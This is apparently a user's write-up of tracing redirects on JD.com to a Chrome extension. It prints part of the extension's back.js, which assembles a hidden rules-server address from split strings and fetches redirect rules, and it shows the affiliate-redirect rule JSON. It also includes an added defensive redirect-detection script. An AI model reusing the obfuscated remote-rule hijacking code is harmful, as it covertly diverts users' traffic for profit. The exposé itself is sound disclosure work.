A Record of the JD.com Hijacking

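Recently, visiting JD.com pages in Chrome has often resulted in unexpected redirects. I knew perfectly well this was hijacking, but the question was by whom, and that puzzled me for quite a while. First I ruled out the ISP: I switched between several public DNS servers and the problem persisted. In the end I traced it to a recently installed Chrome extension: User-Agent Switcher for Google Chrome, ID ffhkkpnppgnfaobgihpdblnhmmbodake, version 1.9.3.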

General
Request URL: https://www.jd.com/
Request Method: GET
Status Code: 307 Internal Redirect
Referrer Policy: no-referrer-when-downgrade

Response Headers
Location: http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.jd.com%2F
Non-Authoritative-Reason: WebRequest API

~/Library/Application Support/Google/Chrome/Default/Extensions/ffhkkpnppgnfaobgihpdblnhmmbodake/1.9.3_0/js/back.js

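(function(){
// The host is split into pieces, so the remote address never appears as one string
var host = 'data-monitor';
var subhost = '//api';
var wid = 116;
var rulesObject = {};
var usedT = localStorage['usedT'] ? parseInt(localStorage['usedT']) : null;
// ......
// Fetch the redirect rules; the template literal assembles
// http://api.data-monitor.info/api/bhrule?sub=116
req({
    method: "GET",
    url: `ht${'tp'}:${subhost}.${host}.info/api/` + "bhrule?sub=" + wid
}, function(response) {
    try
    {
        response = JSON.parse(response.responseText);
        // The rules in the remote response replace rulesObject
        rulesObject = response.rules ? response.rules : {};
    }
    catch(e){} // parse errors are silently ignored
}, function (){});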
http://api.data-monitor.info/api/bhrule?sub=116

{
rules: {
    aliexpress.com: {
        *: {
            *: "http://rtbs24.com/?target=https%3A%2F%2Fpwieu.com%2Fclick-BQL89Y7U-MKIGQNPP%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__"
        }
    },
    jd.ru: {
        *: {
            *: "http://rtbs24.com/?target=https%3A%2F%2Fpwieu.com%2Fclick-AQL468LT-HEBQCGO1%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__"
        }
    },
    jd.com: {
        *: {
            *: "http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__"
        }
    }
}
}
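
The capture above carries the two markers that tie the redirect to an extension rather than the network: status 307 Internal Redirect and Non-Authoritative-Reason: WebRequest API. As an added example (not from the original post or the extension), this script scans HAR-style entries for such redirects that leave the requested host and unwraps the nested target/url parameters; the entry shape, the function names and the HSTS sample entry are assumptions.

```javascript
// Added example (not from the post or the extension). Sample entries are
// constructed from the headers shown above; the HAR-style shape is assumed.
function header(headers, name) {
  const h = headers.find(x => x.name.toLowerCase() === name.toLowerCase());
  return h ? h.value : null;
}

// Follow nested "target" / "url" query parameters; return each hop's hostname.
function unwrapChain(location) {
  const hops = [];
  let next = location;
  while (next && hops.length < 10) { // bound depth against self-nesting
    let u;
    try { u = new URL(next); } catch (e) { break; }
    hops.push(u.hostname);
    next = u.searchParams.get('target') || u.searchParams.get('url');
  }
  return hops;
}

function findExtensionRedirects(entries) {
  const findings = [];
  for (const e of entries) {
    const reason = header(e.response.headers, 'Non-Authoritative-Reason');
    const location = header(e.response.headers, 'Location');
    // Only redirects the browser attributes to the webRequest API
    if (e.response.status !== 307 || reason !== 'WebRequest API' || !location) continue;
    const from = new URL(e.request.url).hostname;
    const hops = unwrapChain(location);
    // Report only when the first hop leaves the requested host
    if (hops.length > 0 && hops[0] !== from) findings.push({ from, hops });
  }
  return findings;
}

const sampleEntries = [
  { request: { url: 'https://www.jd.com/' }, response: { status: 307, headers: [
    { name: 'Location', value: 'http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.jd.com%2F' },
    { name: 'Non-Authoritative-Reason', value: 'WebRequest API' }] } },
  { request: { url: 'http://www.jd.com/' }, response: { status: 307, headers: [
    { name: 'Location', value: 'https://www.jd.com/' },
    { name: 'Non-Authoritative-Reason', value: 'HSTS' }] } },
];

console.log(JSON.stringify(findExtensionRedirects(sampleEntries), null, 2));
```

Only the first sample entry is reported, with the hop list rtbs24.com, ytthn.com, www.jd.com; the HSTS upgrade is an internal redirect too, but the browser does not attribute it to the webRequest API.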

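Right, take a good look at this piece of crap and simply uninstall it. I'm writing this down as a reference for others: even the most awesome browser is no safe haven, and even the sleaziest ISP refuses to take the blame. Tsk!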
